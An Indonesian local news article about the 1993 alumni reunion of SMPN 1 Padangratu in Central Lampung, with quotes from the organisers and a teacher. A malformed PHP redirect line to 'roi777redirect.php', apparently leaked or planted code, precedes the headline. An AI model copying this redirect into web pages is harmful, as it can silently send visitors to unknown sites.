header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Fathul Arifin Gelar Reuni Angkatan 1993 SMPN 1 Padangratu -
Fathul Arifin Gelar Reuni Angkatan 1993 SMPN 1 Padangratu

TRANSLAMPUNG.COM, PADANGRATU – Alumni SMPN 1 Padangratu, Kecamatan Padangratu, Lampung Tengah (Lamteng), angkatan tahun 1993 mengadakan reuni berupa silaturrahmi dan halal bihalal. Reuni yang dilaksanakan Balai Kampung Sriagung, Kecamatan Padangratu, tersebut, dihadiri kurang lebih 70 orang dari 150 orang alumni.

Setelah 25 tahun terpisah kegiatan ini baru pertama kali terlaksana. Menurut Ketua Panitia, Nasib Asmoro, mengumpulkan seluruh alumni angkatan 93 ini meskipun belum semua yang hadir ini tentunya adalah sebuah kebahagiaan tersendiri dikarenakan sebagian besar telah tersebar hampir diseluruh wilayah Indonesia. Bahkan ada yg hadir saat ini berdomisili di Kalimantan.

”Momen hari raya Idul Fitri ini menjadi saat yang tepat, karena sebagian besar ikut mudik merayakan lebaran di kampung halaman. Saya merasa bangga setelah 25 tahun terpisah, namun kekompakan dan persatuan antar alumni dapat terus terjalin. Dengan menggelar pertemuan atau reuni seperti ini,” ujar Nasib.

Sementara Ketua Alumni Angkatan 93, Fathul Arifin, S.IP, M.M, yg saat ini menjabat sebagai Camat Anaktuha yg merupakan pecahan dari Kecamatan Padangratu, acara reuni ini sangat bermanfaat sekali untuk menyambung kembali silaturrahmi yang telah terputus setelah 25 tahun yang lalu lulus dari SMPN 1 Padangratu.

”Selain mempererat silaturrahmi juga diharapkan dapat menjadi sarana bertukar informasi yg positif yg diharapkan dapat memberikan kontribusi terhadap almamater. Banyak alumni yg saat ini tersebar sebagian besar di Pulau Jawa yg mengabdikan diri dalam berbagai bidang. Saya berharap dapat memberikan saran dan masukan terkait almmater tercinta untuk tetap menjadi salah satu sekolah terbaik di Kecamatan Padangratu,” harap Fathul.

Dalam acara reuni tersebut ikut dihadiri oleh salah satu dewan guru yang saat ini masih tetap mengabdi di SMPN 1 Padangratu, yaitu Drs. Kafiat. Dalam sambutannya, Beliau berharap bahwa momen silaturrahmi ini selain ajang temu kangen juga bisa memberikan kontribusi yg positif terhadap almamater yaitu SMPN 1 Padangratu. Yang saat ini seiring kemajuan zaman serta perubahan iklim pendidikan telah banyak merubah wajah sekolah dan siswa-siswi nya.

Alumni angkatan 93 juga memberikan cindera mata kepada, dewan guru yang hadir. Itu dilakukan sebagai wujud terimakasih dan tanda mata atas jasa-jasa Beliau yang telah memberikan ilmunya saat dibangku sekolah. ”Acara reuni ini mengambil tema Apapun Warna Kita, Kita Adalah Sahabat Putih Biru,” demikian diamini oleh Fathul Arifin sebagai ketua alumni, kepada Radar Lamteng, saat ditemui disela-sela kegiatan berlangsung, kemarin. (win)

News Reporter